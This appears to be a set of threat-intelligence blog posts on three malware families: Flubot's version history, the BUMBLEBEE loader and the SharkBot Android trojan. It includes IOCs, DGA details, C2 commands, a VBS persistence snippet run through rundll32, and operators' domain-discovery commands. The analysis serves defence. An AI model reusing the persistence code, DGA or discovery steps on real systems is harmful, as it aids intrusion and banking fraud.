In the month of June the TAs hardly made any changes related to features, but instead they were working on new distribution campaigns.
On version 4.5, TAs added Slovakia, Czech Republic, Greece and Bulgaria to the list of supported countries for future campaigns. TAs reused the same DGA seed for all of them, so it didn’t require too much work from their part to get this version released.

A few days after version 4.5 was observed, a new version 4.6 was discovered with new countries added for future campaigns: Austria and Switzerland. Also, some countries that were removed in previous versions were reintroduced: Sweden, Poland, Hungary, and The Netherlands.

This new version of Flubot didn’t come only with more country coverage. TAs introduced a new distribution campaign lure: VoiceMail. In this new “VoiceMail” campaign, infected devices were used to send text messages to new potential victims using messages in which the user was lead to a fake website. This time a “VoiceMail” app was installed, which should allow the user to listen to the received Voice mail messages. In the following image we can see the VoiceMail campaign for Spanish users.

July 2021: TAs Holidays [Flubot versions 4.7]


July 2021 is the month with less activity. In this month, only one version update was observed at the very beginning of the month – Flubot 4.7. This new version came without the usage of different DGA seeds by country or device language. TAs started to randomly choose the seed from a list of seeds, which were the same seeds that were previously used for country or device language.

Besides the changes related to the DGA seeds, TAs also introduced support for campaigns in new countries: Serbia, Croatia and Bosnia and Herzegovina.

There was almost no Flubot activity in summer. Our assumption is the developers were busy with their summer holidays. As we will see in the following section, TAs will recover their activity in August and October.

August-September 2021: Slow come back from Holidays [Flubot versions 4.7-4.9]


During the first days of August, after TAs possibly enjoyed a nice holiday season, Australia was added to version 4.7 in order to start distribution campaigns in that country.
Only a week later, TAs released the new version 4.8, in which we found some minor changes mostly related to UI messages and alert dialogs.

One more version bump for Flubot was discovered on September, when version 4.9 came out with some more minor changes, just like the previous version 4.8. This time, new web injections were introduced in the C2 servers to steal credentials from victims. Those two new versions with minor changes (not very relevant) seems like a relaxed come back to activity. From our point of view, the most interesting thing that happened in those two months is that TAs started to distribute another malware family using the Flubot botnet. We received from C2 servers a few smishing tasks in which the fake “VoiceMail” website was serving Teabot (also known as Anatsa and Toddler) instead of Flubot.

That was very interesting because it showed that Flubot’s TAs could be also associated with this malware family or at least could be interested on selling the botnet for smishing purposes to other malware developers. As we will see, that was not the only family distributed by Flubot.

October-November 2021: ‘Android Security Update’ campaign and new big protocol changes [Flubot versions 4.9]


During October and most part of November, Flubot’s TAs didn’t bump the version number of the malware and they didn’t do very important moves during that period of time.

At the beginning of October, we saw a campaign different from the previous DHL / Correos / Fedex campaigns or the “VoiceMail” campaign. This time, TAs started to distribute Flubot as a fake security update for Android.
It seems this new distribution campaign wasn’t working as expected, since TAs kept using the “VoiceMail” distribution campaign after a few days.

TAs were very quiet until late November, when they finally released new samples with important changes in the protocol used to communicate with C2 servers. After bumping the version numbers so quickly at the beginning, now TAs weren’t bumping the version number
even with a major change like this one.

This protocol change allowed the malware to communicate with the C2 servers without starting a direct connection with them. Flubot used TXT DNS requests to common public DNS servers (Google, CloudFlare and AliDNS). Then, those requests were forwarded to the actual C2 servers (which implemented DNS servers) to get the TXT record response from the servers and forward it to the malware. The stolen information from the infected device was sent encrypting it using RC4 (in a very similar way to the used in the previous protocol version) and encoding the encrypted bytes. This way, the encoded payload was used as a subdomain of the DGA generated domain. The response from C2 servers was also encrypted and encoded as the TXT record response to the TXT request, and it included the commands to execute smishing tasks for distribution campaign or the web injections used to steal credentials.

With this new protocol, Flubot was using DoH servers from well known companies such as Google and CloudFlare to establish a tunnel of sorts with the C2 servers. With this technique, detecting the malware via network traffic monitoring was very difficult, since the malware wasn’t establishing connections with unknown or malicious servers directly. Also, since it was using DoH, all the DNS requests were encrypted, so network traffic monitoring couldn’t identify those malicious DNS requests.

This major change in the protocol with the C2 servers could also explain the low activity in the previous months. Possibly developers were working on ways to improve the protocol as well as the code of both malware and C2 servers backend.

December 2021: ‘Flash Player’ campaign and DGA changes [Flubot versions 5.0-5.1]


Finally, in December the TAs decided to finally bump the version number to 5.0. This new version brought a minor but interesting change: Flubot can now receive URLs in addition to web injections HTML and JavaScript code. Before version 5.0, C2 servers would send the web injection code, which was saved on the device for future use when the victim opened one of the targeted applications in order to steal the credentials. Since version 5.0, C2 servers were sending URLs instead, so Flubot’s malware had to visit the URL and save the HTML and JavaScript source code in memory for future use.

No more new versions or changes were observed until the end of December, when the TAs wanted to say goodbye to the 2021 by releasing Flubot 5.1. The first samples of Flubot 5.1 were detected on December 31. As we will see in the following section, on January 2 Flubot 5.2 samples came out. Version 5.1 came out with some important changes on DGA. This time, TAs introduced a big list of TLDs to generate new domains, while they also introduced a new command used to receive a new DGA seed from the C2 servers – UPDATE_ALT_SEED. Based on our research, this new command was never used, since all the newly infected devices had to connect to the C2 servers using the domains generated with the hard-coded seeds.

Besides the new changes and features added in December, TAs also introduced a new campaign: “Flash Player”. This campaign was used alongside with “VoiceMail” campaign, which still was the most used to distribute Flubot. In this new campaign, a text message was sent to the victims from infected devices trying to make them install a “Flash Player” application in order to watch a fake video in which the victim appeared. The following image shows how simple the distribution website was, shown when the victim opens the link.

January 2022: Improvements in Smishing features and new ‘Direct Reply’ features [Flubot versions 5.2-5.4]


At the very beginning of January new samples for the new version of Flubot were detected. This time, version 5.2 introduced minor changes in which TAs added support for longer text messages on smishing tasks. They stopped using the usual Android’s “sendTextMessage” function and started to use “sendMultipartTextMessage” alongside “divideMessage” instead. This allowed them to use longer messages, split into multiple messages.

A few days after new sample of version 5.2 was discovered, samples of version 5.3 were detected. In this case, no new features were introduced. TAs removed some unused old code. This version seemed like a version used to clean the code. Also, three days after the first samples of Flubot 5.3 appeared, new samples of this version were detected with support for campaigns in new countries: Japan, Hong Kong, South Korea, Singapore and Thailand.

By the end of January, TAs released a new version: Flubot 5.4. This new version introduced a new and interesting feature: Direct Reply. The malware was now capable to intercept the notifications received in the infected device and automatically reply them with a configured message received from the C2 servers.

To get the message that would be used to reply notifications, Flubot 5.4 introduces a new request command called “GET_NOTIF_MSG”. As the following image shows, this request command is used to get the message to finally be used when a new notification is received.

Even though this was an interesting new feature to improve the botnet’s distribution power, it didn’t last too long. It was removed in the following version.

In the same month we detected Medusa, another Android banking malware, distributed in some Flubot smishing tasks. This means that, one more time, Flubot botnet was being used as a distribution botnet for distribution of another malware family. In August 2021 it was used to distribute Teabot. Now, it has been used to distribute Medusa.

If we try to connect the dots, it could explain the new “Direct Reply” feature and the usage of “multipart messages”. Those improvements could have been introduced due to suggestions made by Medusa’s TAs in order to use Flubot botnet as distribution service.

February-March-April 2022: New cookie stealing features [Flubot versions 5.5]


From late January – when we fist observed version 5.4 in the wild – to late February, almost one month passed until a new version was released. We believe this case is similar to previous periods of time, like August-November 2021, when TAs used that time to introduce a big change in the protocol. This time, it seems TAs were quietly working on new Flubot 5.5, which came with a very interesting feature: Cookie stealing.

The first thing we realized by looking at the new code was a little change when requesting the list of targeted apps. This request must include the list of installed applications in the infected device. As a result, the C2 server would provide the subset of apps which are targeted. In this new version, “.new” was appended to the package names of installed apps when doing the “GET_INJECTS_LIST” request.

At the beginning, the C2 servers were responding with URLs to fetch the web injections for credentials stealing when using “.new” appended to the package’s name.
After some time, C2 servers started to respond with the official URL of the banks and crypto-currency platforms, which seemed strange. After analysis of the code, we realized they also introduced code to steal the cookies from the WebView used to show web injections – in this case, the targeted entity’s website. Clicks and text changes in the different UI elements of the website were also logged and sent to the C2 server, so TAs were not only stealing cookies: they were also able to steal credentials via “keylogging”.

The cookies stealing code could receive an URL, the same way it could receive a URL to fetch web injections, but this time visiting the URL it wasn’t receiving the web injection. Instead, it was receiving a new URL (the official bank or service URL) to be loaded and to steal the credentials from. In the following image, the response from a compromised website used to download the web injections is shown. In this case, it was used to get the payload for stealing GMail’s cookies (shown when the victim tries to open Android Email application).

After the victim logs in to the legitimate website, Flubot will receive and handle an event when the website ends loading. At this time, it gets the cookies and sends them to the C2 server, as can be seen in the following image.

May 2022: MMS smishing and.. The End? [Flubot versions 5.6]


Once again, after one month without new versions in the wild, a new version of Flubot came out at the beginning of May: Flubot 5.6. This is the last known Flubot version.

This new version came with a new interesting feature: MMS smishing tasks. With this new feature, TAs were trying to bypass carriers detections, which were probably put in place after more than a year of activity. A lot of users were infected and their devices where sending text messages without their knowledge.

To introduce this new feature, TAs added new request’s commands:
– GET_MMS: used to get the phone number and the text message to send (similar to the usual GET_SMS used before for smishing)
– MMS_RATE: used to get the time rate to make “GET_MMS” request and send the message (similar to the usual SMS_RATE used before for smishing).

After this version got released on May 1st, the C2 servers stopped working on May 21st. They were offline until May 25th, but they were still not working properly, since they were replying with empty responses. Finally, on June 1st, Europol published on their website that they took down the Flubot’s infrastructure with the cooperation of police from different countries. Dutch Police was the one that took down the infrastructure. It probably happened because Flubot C2 servers, at some point in 2022, changed the hosting services to a hosting service in The Netherlands, making it easier to take down.

Does it mean this is the end of Flubot? Well, we can’t know for sure, but it seems police wasn’t able to get the RSA private keys since they didn’t make the C2 servers send commands to detect and remove the malware from the devices.
This means that the TAs should be able to bring Flubot back by just registering new domains and setting up all the infrastructure in a “safer” country and hosting service. TAs could recover their botnet, with less infected devices due to the offline time, but still with some devices to continue sending smishing messages to infect new devices. It depends on the TAs intentions, since it seems that the police hasn’t found them yet.

Conclusion

Flubot has been one of the most – if not the most – active banking malware family of the last few years. Probably this was due to their powerful distribution strategy: smishing. This malware has been using the infected devices to send text messages to the phone numbers which were stolen from the victims smartphones. But this, in combination with fake parcel shipping messages in a period of time in which everybody is used to buy things online has made it an important threat.

As we have seen in this post, TAs have introduced new features very frequently, which made Flubot even more dangerous and contagious. A significant part of the updates and new features have been introduced to improve the distribution capabilities of the malware in different countries, while others have been introduced to improve the credentials and information stealing capabilities.

Some updates delivered major changes in the protocol, making it more difficult to detect via network monitoring, with a DoH tunnel-based protocol which is really uncommon in the world of Android Malware. It seems that TAs have even been interested on selling some kind of “smishing distribution” service to other TAs, as we have seen with the association with Teabot and Medusa.

After one year and a half, Dutch Police was able to take down the C2 servers after TAs started using a Dutch hosting service. It seems to be the end of Flubot, at least for now.

TAs still can move the infrastructure back to a “safer” hosting and register new DGA domains to recover their botnet. It’s too soon to determine that was the end of Flubot. Time will tell what will happen with this Android malware family, which has been one of the most important and interesting malware families in the last few years.

List of samples by version

0.1 – 5e0311fb1d8dda6b5da28fa3348f108ffa403f3a3cf5a28fc38b12f3cab680a0
0.5 – d3af7d46d491ae625f66451258def5548ee2232d116f77757434dd41f28bac69
1.2 – c322a23ff73d843a725174ad064c53c6d053b6788c8f441bbd42033f8bb9290c
1.7 – 75c2d4abecf1cc95ca8aeb820e65da7a286c8ed9423630498a95137d875dfd28
1.9 – 9420060391323c49217ce5d40c23d3b6de08e277bcf7980afd1ee3ce17733da2
2.1 – 13013d2f96c10b83d79c5b4ecb433e09dbb4f429f6d868d448a257175802f0e9
2.2 – 318e4d4421ce1470da7a23ece3db5e6e4fe9532e07751fc20b1e35d7d7a88ec7
2.8 – f3257b1f0b2ed1d67dfa1e364c4adc488b026ca61c9d9e0530510d73bd1cf77e
3.1 – affaf5f9ba5ea974c605f09a0dd7776d549e5fec2f946057000abe9aae1b3ce1
3.2 – 865aaf13902b312a18abc035f876ad3dfedce5750dba1f2cc72aabd68d6d1c8f
3.4 – ca18a3331632440e9b86ea06513923b48c3d96bc083310229b8c5a0b96e03421
3.5 – 43a2052b87100cf04e67c3c8c400fa203e0e8f08381929c935cff2d1f80f0729
3.6 – fd5f7648d03eec06c447c1c562486df10520b93ad7c9b82fb02bd24b6e1ec98a
3.7 – 1adba4f7a2c9379a653897486e52123d7c83807e0e7e987935441a19eac4ce2c
3.9 – 1cf5c409811bafdc4055435a4a36a6927d0ae0370d5197fcd951b6f347a14326
4.0 – 8e2bd71e4783c80a523317afb02d26cac808179c57834c5c599d976755b1dabd
4.1 – ec3c35f17e539fe617ca2e73da4a51dc8efedda94fd1f8b50a5b77d63e58ba5c
4.2 – 368cebac47e36c81fb2f1d8292c6c89ccb10e3203c5927673ce05ba29562f19c
4.3 – dab4ce5fbb1721f24bbb9909bb59dcc33432ccf259ee2d3a1285f47af478416d
4.4 – 6a03efa4ffa38032edfb5b604672e8c9e01a324f8857b5848e8160593dfb325e
4.5 – f899993c6109753d734b4faaf78630dc95de7ea3db78efa878da7fbfc4aee7cd
4.6 – ffaebdbc8c2ecd63f9b97781bb16edc62b2e91b5c69e56e675f6fbba2d792924
4.7 – a0dd408a893f4bc175f442b9050d2c328a46ff72963e007266d10d26a204f5af
4.8 – a0181864eed9294cac0d278fa0eadabe68b3adb333eeb2e26cc082836f82489d
4.9 – 831334e1e49ec7a25375562688543ee75b2b3cc7352afc019856342def52476b
4.9 – 8c9d7345935d46c1602936934b600bb55fa6127cbdefd343ad5ebf03114dbe45 (DoH tunnel protocol)
5.0 – 08d8dd235769dc19fb062299d749e4a91b19ef5ec532b3ce5d2d3edcc7667799
5.1 – ff2d59e8a0f9999738c83925548817634f8ac49ec8febb20cfd9e4ce0bf8a1e3
5.2 – 4859ab9cd5efbe0d4f63799126110d744a42eff057fa22ff1bd11cb59b49608c
5.3 – e9ff37663a8c6b4cf824fa65a018c739a0a640a2b394954a25686927f69a0dd4
5.4 – df98a8b9f15f4c70505d7c8e0c74b12ea708c084fbbffd5c38424481ae37976f
5.5 – 78d6dc4d6388e1a92a5543b80c038ac66430c7cab3b877eeb0a834bce5cb7c25
5.6 – 16427dc764ddd03c890ccafa61121597ef663cba3e3a58fc6904daf644467a7c

Adventures in the land of BumbleBee

Authored by: Nikolaos Totosis, Nikolaos Pantazopoulos and Mike Stokkel

Executive summary

BUMBLEBEE is a new malicious loader that is being used by several threat actors and has been observed to download different malicious samples. The key points are:

  • BUMBLEBEE is statically linked with the open-source libraries OpenSSL 1.1.0f, Boost (version 1.68). In addition, it is compiled using Visual Studio 2015.
  • BUMBLEBEE uses a set of anti-analysis techniques. These are taken directly from the open-source project [1].
  • BUMBLEBEE has Rabbort.DLL embedded, using it for process injection.
  • BUMBLEBEE has been observed to download and execute different malicious payloads such as Cobalt Strike beacons.

Introduction

In March 2022, Google’s Threat Analysis Group [2] published about a malware strain linked to Conti’s Initial Access Broker, known as BUMBLEBEE. BUMBLEBEE uses a comparable way of distribution that is overlapping with the typical BazarISO campaigns.

In the last months BUMBLEBEE, would use three different distribution methods:

  • Distribution via ISO files, which are created either with StarBurn ISO or PowerISO software, and are bundled along with a LNK file and the initial payload.
  • Distribution via OneDrive links.
  • Email thread hijacking with password protected ZIP

BUMBLEBEE is currently under heavy development and has seen some small changes in the last few weeks. For example, earlier samples of BUMBLEBEE used the user-agent ‘bumblebee’ and no encryption was applied to the network data. However, this functionality has changed, and recent samples use a hardcoded key as user-agent which is also acting as the RC4 key used for the entire network communication process.

Technical analysis

Most of the identified samples are protected with what appears to be a private crypter and has only been used for BUMBLEBEE binaries so far. This crypter uses an export function with name SetPath and has not implemented any obfuscation method yet (e.g. strings encryption).

The BUMBLEBEE payload starts off by performing a series of anti-analysis checks, which are taken directly from the open source Khasar project[1]. After these checks passed, BUMBLEBEE proceeds with the command-and-control communication to receive tasks to execute.

Network communication

BUMBLEBEE’s implemented network communication procedure is quite simple and straightforward. First, the loader picks an (command-and-control) IP address and sends a HTTPS GET request, which includes the following information in a JSON format (encrypted with RC4):

KeyDescription
client_idA MD5 hash of a UUID value taken by executing the WMI command ‘SELECT * FROM Win32_ComputerSystemProduct’.
group_nameA hard-coded value, which represents the group that the bot (compromised host) will be added.
sys_versionWindows OS version
client_versionDefault value that’s set to 1
domain_nameDomain name taken by executing the WMI command ‘SELECT * FROM Win32_ComputerSystem’.
task_stateSet to 0 by default. Used only when the network commands with task name ‘ins‘ or ‘sdl‘ are executed
task_idSet to 0 by default. Used only when the network commands with task name ‘ins‘ or ‘sdl‘ are executed
Description of the values sent to BUMBLEBEE servers

Once the server receives the request, it replies with the following data in a JSON format:

KeyDescription
response_statusBoolean value, which shows if the server correctly parsed the loader’s request. Set to 1 if successful.
tasksArray containing all the tasks
taskTask name
task_idID of the received task, which is set by the operator(s)
task_dataData for the loader to execute in Base64 encoded format
file_entry_pointPotentially represents an offset value. We have not observed this being used either in the binary’s code or during network communication (set to an empty string).
Description of the values returned by the BUMBLEBEE servers

Tasks

Based on the returned tasks from the command-and-control servers, BUMBLEBEE will execute one of the tasks described below. For two of the tasks, shi and dij, BUMBLEBEE uses a list of predefined process images paths:

  • C:\Program Files\Windows Photo Viewer\ImagingDevices.exe
  • C:\Program Files\Windows Mail\wab.exe
  • C:\Program Files\Windows Mail\wabmig.exe
Task nameDescription
shiInjects task’s data into a new process. The processes images paths described above and a random selection is made
dijInjects task’s data into a new process. The injection method defers from the method used in task ‘dij’. The processes images paths described above and a random selection is made.
dexWrites task’s data into a file named ‘wab.exe’ under the Windows in AppData folder.
sdlDeletes loader’s binary from disk.
insAdds persistence to the compromised host.
Description of the tasks performed by BUMBLEBEE

For the persistence mechanism, BUMBLEBEE creates a new directory in the Windows AppData folder with the directory’s name being derived by the client_id MD5 value. Next, BUMBLEBEE copies itself to its new directory and creates a new VBS file with the following content:

Set objShell = CreateObject("Wscript.Shell")
objShell.Run "rundll32.exe my_application_path, IternalJob"

Lastly, it creates a scheduled task that has the following metadata (this can differ from sample to sample):

  1. Task name – Randomly generated. Up to 7 characters.
  2. Author – Asus
  3. Description – Video monitor
  4. Hidden from the UI: True
  5. Path: %WINDIR%\System32\wscript.exe VBS_Filepath

Similarly with the directory’ name, the new loader’s binary and VBS filenames are derived from the ‘client_id’ MD5 value too.

Additional observations

This sub-section contains notes that were collected during the analysis phase and worth to be mentioned too.

  • The first iterations of BUMBLEBEE were observed in September 2021 and were using “/get_load” as URI. Later, the samples started using “/gate”. On 19th of April, they switched to “/gates”, replacing the previous URI.
  • The “/get_load” endpoint is still active on the recent infrastructure – this is probably either for backwards compatibility or ignored by the operator(s). Besides this, most of the earlier samples using URI endpoint are uploaded from non-European countries.
  • Considering that BUMBLEBEE is actively being developed on, the operator(s) did not implement a command to update the loader’s binary, resulting the loss of existing infections.
  • It was found via server errors (during network requests and from external parties) that the backend is written in Golang.
  • As mentioned above, every BUMBLEBEE binary has an embedded group tag. Currently, we have observed the following group tags:
VPS1GROUPALLdll
VPS2GROUP1804RA
VS2G1904r
VPS12004r
SP11904l
RA110425html
LEG07042504r
AL12042704r
RAI1204
Observed BUMBLEBEE group tags
  • As additional payloads, NCC Group’s RIFT has observed mostly Cobalt Strike and Meterpeter being sent as tasks. However, third parties have confirmed the drop of Sliver and Bokbot payloads.
  • While analyzing NCC Group’s RIFT had a case where the command-and-control server sent the same Meterpeter PE file in two different tasks in the same request to be executed. This is probably an attempt to ensure execution of the downloaded payload (Figure 1). There were also cases where the server initially replied with a Cobalt Strike beacon and then followed up with more than two additional payloads, both being Meterpeter.
Figure 1 – Duplicated tasks received
  • In one case, the downloaded Cobalt Strike beacon was executed in a sandbox environment and revealed the following commands and payloads were executed by the operator(s):
    • net group “domain admins” /domain
    • ipconfig /all
    • netstat -anop tcp
    • execution of Mimikatz

Indicators of compromise (IOC’s)

TypeDescriptionValue
IPv4Meterpreter command-and-control server, linked to Group ID 2004r & 25html23.108.57[.]13
IPv4Meterpreter command-and-control server, linked to Group ID 2004r & 2504r130.0.236[.]214
IPv4Cobalt Strike server, linked to Group ID 1904r93.95.229[.]160
IPv4Cobalt Strike server, linked to Group ID 2004r141.98.80[.]175
IPv4Cobalt Strike server, linked to Group ID 2504r & 2704r185.106.123[.]74
IPv4BUMBLEBEE command-and-control servers103.175.16[.]45
103.175.16[.]46
104.168.236[.]99
108.62.118[.]236
108.62.118[.]56
108.62.118[.]61
108.62.118[.]62
108.62.12[.]12
116.202.251[.]3
138.201.190[.]52
142.234.157[.]93
142.91.3[.]109
142.91.3[.]11
149.255.35[.]167
154.56.0[.]214
154.56.0[.]216
168.119.62[.]39
172.241.27[.]146
172.241.29[.]169
185.156.172[.]62
192.236.198[.]63
193.29.104[.]176
199.195.254[.]17
199.80.55[.]44
209.141.59[.]96
209.151.144[.]223
213.227.154[.]158
213.232.235[.]105
23.106.160[.]120
23.106.160[.]39
23.227.198[.]217
23.254.202[.]59
23.81.246[.]187
23.82.140[.]133
23.82.141[.]184
23.82.19[.]208
23.83.133[.]1
23.83.133[.]182
23.83.133[.]216
23.83.134[.]110
23.83.134[.]136
28.11.143[.]222
37.72.174[.]9
45.11.19[.]224
45.140.146[.]244
45.140.146[.]30
45.147.229[.]177
45.147.229[.]23
45.147.231[.]107
49.12.241[.]35
71.1.188[.]122
79.110.52[.]191
85.239.53[.]25
89.222.221[.]14
89.44.9[.]135
89.44.9[.]235
91.213.8[.]23
91.90.121[.]73
Indicators of compromise

References

[1] – https://github.com/LordNoteworthy/al-khaser

[2] – https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store


Authors:

  • Alberto Segura, Malware analyst
  • Rolf Govers, Malware analyst & Forensic IT Expert

NCC Group, as well as many other researchers noticed a rise in Android malware last year, especillay Android banking malware. Within the Treat Intelligence team of NCC Group we’re looking closely to several of these malware families to provide valuable information to our customers about these threats. Next to the more popular Android banking malware NCC Group’s Threat Intelligence team also watches new trends and new families that arise and could be potential threats to our customers.

One of these ‘newer’ families is an Android banking malware called SharkBot. During our research NCC Group noticed that this malware was disturbed via the official Google play store. After discovery NCC Group immediately notified Google and decided to share our knowledge via this blog post.

Summary

SharkBot is an Android banking malware found at the end of October 2021 by the Cleafy Threat Intelligence Team. At the moment of writing the SharkBot malware doesn’t seem to have any relations with other Android banking malware like Flubot, Cerberus/Alien, Anatsa/Teabot, Oscorp, etc.

The Cleafy blogpost stated that the main goal of SharkBot is to initiate money transfers (from compromised devices) via Automatic Transfer Systems (ATS). As far as we observed, this technique is an advanced attack technique which isn’t used regularly within Android malware. It enables adversaries to auto-fill fields in legitimate mobile banking apps and initate money transfers, where other Android banking malware, like Anatsa/Teabot or Oscorp, require a live operator to insert and authorize money transfers. This technique also allows adversaries to scale up their operations with minimum effort.

The ATS features allow the malware to receive a list of events to be simulated, and them will be simulated in order to do the money transfers. Since this features can be used to simulate touches/clicks and button presses, it can be used to not only automatically transfer money but also install other malicious applications or components. This is the case of the SharkBot version that we found in the Google Play Store, which seems to be a reduced version of SharkBot with the minimum required features, such as ATS, to install a full version of the malware some time after the initial install.

Because of the fact of being distributed via the Google Play Store as a fake Antivirus, we found that they have to include the usage of infected devices in order to spread the malicious app. SharkBot achieves this by abusing the ‘Direct Reply‘ Android feature. This feature is used to automatically send reply notification with a message to download the fake Antivirus app. This spread strategy abusing the Direct Reply feature has been seen recently in another banking malware called Flubot, discovered by ThreatFabric.

What is interesting and different from the other families is that SharkBot likely uses ATS to also bypass multi-factor authentication mechanisms, including behavioral detection like bio-metrics, while at the same time it also includes more classic features to steal user’s credentials.

Money and Credential Stealing features

SharkBot implements the four main strategies to steal banking credentials in Android:

  • Injections (overlay attack): SharkBot can steal credentials by showing a WebView with a fake log in website (phishing) as soon as it detects the official banking app has been opened.
  • Keylogging: Sharkbot can steal credentials by logging accessibility events (related to text fields changes and buttons clicked) and sending these logs to the command and control server (C2).
  • SMS intercept: Sharkbot has the ability to intercept/hide SMS messages.
  • Remote control/ATS: Sharkbot has the ability to obtain full remote control of an Android device (via Accessibility Services).

For most of these features, SharkBot needs the victim to enable the Accessibility Permissions & Services. These permissions allows Android banking malware to intercept all the accessibility events produced by the interaction of the user with the User Interface, including button presses, touches, TextField changes (useful for the keylogging features), etc. The intercepted accessibility events also allow to detect the foreground application, so banking malware also use these permissions to detect when a targeted app is open, in order to show the web injections to steal user’s credentials.

Delivery

Sharkbot is distributed via the Google Play Store, but also using something relatively new in the Android malware: ‘Direct reply‘ feature for notifications. With this feature, the C2 can provide as message to the malware which will be used to automatically reply the incoming notifications received in the infected device. This has been recently introduced by Flubot to distribute the malware using the infected devices, but it seems SharkBot threat actors have also included this feature in recent versions.

In the following image we can see the code of SharkBot used to intercept new notifications and automatically reply them with the received message from the C2.

In the following picture we can see the ‘autoReply’ command received by our infected test device, which contains a shortten Bit.ly link which redirects to the Google Play Store sample.

We detected the SharkBot reduced version published in the Google Play on 28th February, but the last update was on 10th February, so the app has been published for some time now. This reduced version uses a very similar protocol to communicate with the C2 (RC4 to encrypt the payload and Public RSA key used to encrypt the RC4 key, so the C2 server can decrypt the request and encrypt the response using the same key). This SharkBot version, which we can call SharkBotDropper is mainly used to download a fully featured SharkBot from the C2 server, which will be installed by using the Automatic Transfer System (ATS) (simulating click and touches with the Accessibility permissions).

This malicious dropper is published in the Google Play Store as a fake Antivirus, which really has two main goals (and commands to receive from C2):

  • Spread the malware using ‘Auto reply’ feature: It can receive an ‘autoReply’ command with the message that should be used to automatically reply any notification received in the infected device. During our research, it has been spreading the same Google Play dropper via a shorten Bit.ly URL.
  • Dropper+ATS: The ATS features are used to install the downloaded SharkBot sample obtained from the C2. In the following image we can see the decrypted response received from the C2, in which the dropper receives the command ‘b‘ to download the full SharkBot sample from the provided URL and the ATS events to simulate in order to get the malware installed.

With this command, the app installed from the Google Play Store is able to install and enable Accessibility Permissions for the fully featured SharkBot sample it downloaded. It will be used to finally perform the ATS fraud to steal money and credentials from the victims.

The fake Antivirus app, the SharkBotDropper, published in the Google Play Store has more than 1,000 downloads, and some fake comments like ‘It works good’, but also other comments from victims that realized that this app does some weird things.

Technical analysis

Protocol & C2

The protocol used to communicate with the C2 servers is an HTTP based protocol. The HTTP requests are made in plain, since it doesn’t use HTTPs. Even so, the actual payload with the information sent and received is encrypted using RC4. The RC4 key used to encrypt the information is randomly generated for each request, and encrypted using the RSA Public Key hardcoded in each sample. That way, the C2 can decrypt the encrypted key (rkey field in the HTTP POST request) and finally decrypt the sent payload (rdata field in the HTTP POST request).

If we take a look at the decrypted payload, we can see how SharkBot is simply using JSON to send different information about the infected device and receive the commands to be executed from the C2. In the following image we can see the decrypted RC4 payload which has been sent from an infected device.

Two important fields sent in the requests are:

  • ownerID
  • botnetID

Those parameters are hardcoded and have the same value in the analyzed samples. We think those values can be used in the future to identify different buyers of this malware, which based on our investigation is not being sold in underground forums yet.

Domain Generation Algorithm

SharkBot includes one or two domains/URLs which should be registered and working, but in case the hardcoded C2 servers were taken down, it also includes a Domain Generation Algorithm (DGA) to be able to communicate with a new C2 server in the future.

The DGA uses the current date and a specific suffix string (‘pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf’) to finally encode that in base64 and get the first 19 characters. Then, it append different TLDs to generate the final candidate domain.

The date elements used are:

  • Week of the year (v1.get(3) in the code)
  • Year (v1.get(1) in the code)

It uses the ‘+’ operator, but since the week of the year and the year are Integers, they are added instead of appended, so for example: for the second week of 2022, the generated string to be base64 encoded is: 2 + 2022 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = 2024 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = “2024pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf”.

In previous versions of SharkBot (from November-December of 2021), it only used the current week of the year to generate the domain. Including the year to the generation algorithm seems to be an update for a better support of the new year 2022.

Commands

SharkBot can receive different commands from the C2 server in order to execute different actions in the infected device such as sending text messages, download files, show injections, etc. The list of commands it can receive and execute is as follows:

  • smsSend: used to send a text message to the specified phone number by the TAs
  • updateLib: used to request the malware downloads a new JAR file from the specified URL, which should contain an updated version of the malware
  • updateSQL: used to send the SQL query to be executed in the SQLite database which Sharkbot uses to save the configuration of the malware (injections, etc.)
  • stopAll: used to reset/stop the ATS feature, stopping the in progress automation.
  • updateConfig: used to send an updated config to the malware.
  • uninstallApp: used to uninstall the specified app from the infected device
  • changeSmsAdmin: used to change the SMS manager app
  • getDoze: used to check if the permissions to ignore battery optimization are enabled, and show the Android settings to disable them if they aren’t
  • sendInject: used to show an overlay to steal user’s credentials
  • getNotify: used to show the Notification Listener settings if they are not enabled for the malware. With this permissions enabled, Sharkbot will be able to intercept notifications and send them to the C2
  • APP_STOP_VIEW: used to close the specified app, so every time the user tries to open that app, the Accessibility Service with close it
  • downloadFile: used to download one file from the specified URL
  • updateTimeKnock: used to update the last request timestamp for the bot
  • localATS: used to enable ATS attacks. It includes a JSON array with the different events/actions it should simulate to perform ATS (button clicks, etc.)

Automatic Transfer System

One of the distinctive parts of SharkBot is that it uses a technique known as Automatic Transfer System (ATS). ATS is a relatively new technique used by banking malware for Android.

To summarize ATS can be compared with webinject, only serving a different purpose. Rather then gathering credentials for use/scale it uses the credentials for automatically initiating wire transfers on the endpoint itself (so without needing to log in and bypassing 2FA or other anti-fraud measures). However, it is very individually tailored and request quite some maintenance for each bank, amount, money mules etc. This is probably one of the reasons ATS isn’t that popular amongst (Android) banking malware.

How does it work?

Once a target logs into their banking app the malware would receive an array of events (clicks/touches, button presses, gestures, etc.) to be simulated in an specific order. Those events are used to simulate the interaction of the victim with the banking app to make money transfers, as if the user were doing the money transfer by himself.

This way, the money transfer is made from the device of the victim by simulating different events, which make much more difficult to detect the fraud by fraud detection systems.

IoCs

Sample Hashes:

  • a56dacc093823dc1d266d68ddfba04b2265e613dcc4b69f350873b485b9e1f1c (Google Play SharkBotDropper)
  • 9701bef2231ecd20d52f8fd2defa4374bffc35a721e4be4519bda8f5f353e27a (Dropped SharkBot v1.64.1)

SharkBotDropper C2:

  • hxxp://statscodicefiscale[.]xyz/stats/

‘Auto/Direct Reply’ URL used to distribute the malware:

  • hxxps://bit[.]ly/34ArUxI

Google Play Store URL:

C2 servers/Domains for SharkBot:

  • n3bvakjjouxir0zkzmd[.]xyz (185.219.221.99)
  • mjayoxbvakjjouxir0z[.]xyz (185.219.221.99)

RSA Public Key used to encrypt RC4 key in SharkBot:

